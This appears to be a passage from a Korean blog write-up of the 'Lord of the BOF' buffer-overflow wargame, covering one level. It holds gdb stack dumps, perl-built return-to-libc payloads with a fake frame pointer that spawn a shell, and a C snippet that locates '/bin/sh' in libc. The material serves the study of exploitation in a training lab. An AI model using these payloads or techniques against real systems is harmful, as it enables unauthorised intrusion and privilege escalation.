0xbffffb60: 0x00006120 0x4000220c 0x08048390 0x00000000
0xbffffb70: 0x00000000 0x40020e90 0x00000612 0x40021fd0
(gdb) q
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "AAAA"'`
AAAA@BBBBù¿@(ü ¿AAAA
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb -c core -q
Core was generated by `./newbie_assassin AAAA@BBBBù¿@(ü ¿AAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) x/60wx $esp-60
0xbffffaa4: 0x080484dc 0x0804857e 0xbffffab0 0x41414141
0xbffffab4: 0x40058ae0 0x42424242 0x400fbff9 0x90909090
0xbffffac4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad4: 0x90909090 0xbffffc28 0x41414141 0x00000002
0xbffffae4: 0xbffffb24 0xbffffb30 0x40013868 0x00000002
0xbffffaf4: 0x08048390 0x00000000 0x080483b1 0x08048440
0xbffffb04: 0x00000002 0xbffffb24 0x080482e4 0x0804851c
0xbffffb14: 0x4000ae60 0xbffffb1c 0x40013e90 0x00000002
0xbffffb24: 0xbffffc16 0xbffffc28 0x00000000 0xbffffc59
0xbffffb34: 0xbffffc6c 0xbffffc84 0xbffffca3 0xbffffcc5
0xbffffb44: 0xbffffcd3 0xbffffe96 0xbffffeb5 0xbffffed3
0xbffffb54: 0xbffffee8 0xbfffff08 0xbfffff13 0xbfffff24
0xbffffb64: 0xbfffff2c 0xbfffff36 0xbfffff46 0xbfffff54
0xbffffb74: 0xbfffff62 0xbfffff73 0xbfffff7e 0xbfffff92
0xbffffb84: 0xbfffffd6 0x00000000 0x00000003 0x08048034
(gdb) x/wx 0xbffffaaf
0xbffffaaf: 0x414141bf
(gdb) x/wx 0xbffffaae
0xbffffaae: 0x4141bfff
(gdb) x/wx 0xbffffab1
0xbffffab1: 0xe0414141
(gdb) x/wx 0xbffffab0
0xbffffab0: 0x41414141
(gdb) q
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@°ú ¿߄
bash$ q
sh: q: command not found
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@°ú ¿߄
bash$ my-pass
euid = 516
*) Libc에서 /bin/sh를 찾아 사용하였는데 찾는 소스는 여기서 얻어온거에여.
<http://www.win.tue.nl/~aeb/linux/hh/hh-10.html>
-해당 소스-
[assassin@localhost assassin]$ cat foo.c
main(){
char *p;
p = 0x4002c000;
while (1) {
while (*p++ != '/') ;
if (strcmp(p-1, "/bin/sh") == 0) {
printf("0x%08x\n", p-1);
return 0;
}
}
}
'STUDY > Lord of the BOF' 카테고리의 다른 글
| zombie_assassin->succubus (0) | 2014.07.08 |
|---|---|
| assassin->zombie_assassin (2) | 2014.06.26 |
| giant->assassin (0) | 2014.04.22 |
| bugbear->giant(1) (0) | 2014.04.16 |
| darkknight->bugbear (2) | 2014.04.07 |